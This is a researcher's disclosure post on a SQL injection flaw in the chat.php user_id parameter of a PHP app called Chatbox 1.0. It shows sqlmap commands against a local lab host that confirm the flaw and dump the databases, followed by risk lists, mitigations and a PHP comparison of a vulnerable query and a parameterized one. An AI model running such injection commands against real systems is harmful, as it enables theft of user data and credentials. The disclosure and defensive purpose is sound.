Hi All,
I am Maloy Roy Orko.
CVE Number: In Review
CWE: 89
Recently, during one of my pentest research sessions, I found a chat application built using PHP and JavaScript by shafhasan.
Curious to explore its functionalities, I downloaded it and set it up on my local system.
After fiddling with the source code, I found that it did not have any kind of SQL injection protection.
This puts mass user data at risk; the database can be leaked by hackers, and the admin panel credentials are at risk too.
The main thing is: if any non-IT person uses this template, they will be exposed to this vulnerability and their company's reputation can be damaged too. That's why I am trying to inform everyone about this.
Title of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko
Vulnerability Class: SQL Injection
Product Name: Chatbox 1.0
Vendor: https://github.com/shafhasan/
Vulnerable Product Link:
https://github.com/shafhasan/chatbox
Technical Details & Description: The application source code is written in a way that allows SQL injection. This puts mass user data at risk; the database can be leaked by hackers, and the admin panel credentials are at risk too.
Product & Service Introduction: Chatbox 1.0, built using JavaScript and PHP
Observation & Exploitation:
So let's see: how did I exploit it? What is the exploitable parameter here?
That is: chat.php?user_id=
Let's take an example and then see the exploit used here!
Vulnerable Place :
http://192.168.0.103:8080/chat/chat.php?user_id=1268013315
So, let's see the approach and the result.
First we will try to confirm whether it is SQL injection or not, then we will determine its type, and then see the exploitation!
So,I used sqlmap:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4
As you can see, it is vulnerable to SQL injection.
So I tried automation!
I used sqlmap to exploit it and get all databases!
Command:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs
Result:
As you can see, all databases have been dumped!
Let's do data exposure:
My exploit for this information disclosure:
python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump
Guess what?
It is clearly a SQL injection vulnerability.
Risks of SQL Injection:
Data Breach: Attackers can gain unauthorized access to sensitive data, including personal information, financial records, and confidential business information.
Data Manipulation: Attackers can modify, delete, or insert data into the database, leading to data integrity issues and loss of critical information.
Authentication Bypass: SQL injection can allow attackers to bypass authentication mechanisms, gaining unauthorized access to user accounts or administrative functions.
Remote Code Execution: In some cases, SQL injection can lead to the execution of arbitrary code on the server, allowing attackers to take control of the server.
Denial of Service (DoS): Attackers can exploit SQL injection to execute heavy queries that can slow down or crash the database.
Privilege Escalation: Attackers can exploit SQL injection to gain higher privileges than intended, allowing them to perform actions that should be restricted.
Data Exfiltration: Attackers can extract large volumes of data from the database, which can be used for identity theft, fraud, or sold on the dark web.
Reputation Damage: Organizations that suffer from SQL injection attacks may face reputational damage, loss of customer trust, and potential legal consequences.
Impacts of SQL Injection:
Financial Loss: The costs associated with a data breach can be significant, including legal fees, regulatory fines, and costs related to remediation and recovery.
Legal Consequences: Organizations may face lawsuits or regulatory penalties for failing to protect sensitive data, especially if they are subject to data protection regulations (e.g., GDPR, HIPAA).
Operational Disruption: A successful SQL injection attack can disrupt business operations, leading to downtime and loss of productivity.
Loss of Intellectual Property: Attackers may gain access to proprietary information, trade secrets, or other intellectual property, which can be detrimental to a business's competitive advantage.
Increased Security Costs: Organizations may need to invest in enhanced security measures, such as application firewalls, security audits, and employee training, to prevent future attacks.
Customer Trust Erosion: Customers may lose trust in an organization that has experienced a data breach, leading to decreased customer loyalty and potential loss of business.
Mitigation Strategies:
To mitigate the risks associated with SQL injection, organizations should implement the following strategies:
Parameterized Queries: Use prepared statements and parameterized queries to ensure that user input is treated as data, not executable code.
Input Validation: Validate and sanitize all user inputs to ensure they conform to expected formats and types.
Least Privilege Principle: Limit database user permissions to the minimum necessary for application functionality.
Web Application Firewalls (WAF): Deploy WAFs to help detect and block SQL injection attempts.
Regular Security Audits: Conduct regular security assessments and code reviews to identify and remediate vulnerabilities.
Security Awareness Training: Educate developers and staff about secure coding practices and the risks associated with SQL injection.
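As an added illustration of the first three strategies above, here is a minimal PHP handler for a user_id parameter written in the unsafe style this advisory describes, next to a hardened version. This is not code from the Chatbox project (its chat.php is not reproduced here); the table and column names (messages, id, body, user_id), the DSN and the database account name are assumptions chosen for the example.

```php
<?php
// Added example, not the Chatbox project's code. Table, column and account
// names below are assumptions for illustration.
declare(strict_types=1);

// --- Vulnerable pattern (the kind of code the advisory describes) ---
// The raw query-string value is concatenated into the SQL text, so anything
// the client sends becomes part of the statement instead of being data.
function loadMessagesVulnerable(PDO $db, string $userId): array
{
    $sql = "SELECT id, body FROM messages WHERE user_id = " . $userId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened version ---
// 1. Input validation: user_id must be a positive integer, otherwise the
//    request is rejected before any database call is made.
function parseUserId(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    // FILTER_VALIDATE_INT with min_range rejects quotes, spaces, SQL keywords,
    // empty strings, zero and negative values in one check.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// 2. Parameterized query: the value is bound as an integer parameter and is
//    never spliced into the SQL text, so it is always treated as data.
function loadMessages(PDO $db, int $userId): array
{
    $stmt = $db->prepare('SELECT id, body FROM messages WHERE user_id = :user_id');
    $stmt->bindValue(':user_id', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 3. Least privilege: connect as an account (assumed name: chat_app) that has
//    only SELECT/INSERT on the chat tables, not a root or admin login.
function connect(): PDO
{
    $dsn = 'mysql:host=127.0.0.1;dbname=chatbox;charset=utf8mb4'; // assumed DSN
    return new PDO($dsn, 'chat_app', getenv('CHAT_DB_PASSWORD') ?: '', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepared statements, so the database engine
        // separates the statement from its parameters.
        PDO::ATTR_EMULATE_PREPARES   => false,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// Request handler for chat.php?user_id=...
$userId = parseUserId($_GET['user_id'] ?? null);
if ($userId === null) {
    http_response_code(400);
    echo 'invalid user_id';
    exit;
}

$db = connect();
// Parameterization stops injection; it does not decide who may read which
// messages. The session check that ties user_id to the logged-in user is
// still required and is outside the scope of this example.
header('Content-Type: application/json');
echo json_encode(loadMessages($db, $userId));
```

The two functions return the same rows for a well-formed request; the difference is that loadMessages cannot be made to run a different statement, and parseUserId turns every malformed value into a 400 response, which also gives the web server log a clear signal to alert on.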
Conclusion:
The main aim of this article is to show that if any non-IT person uses this template, they will be exposed to this vulnerability and their company's reputation can be damaged too. But I also hope it gives you ideas of how combining attacks can make them much more potent.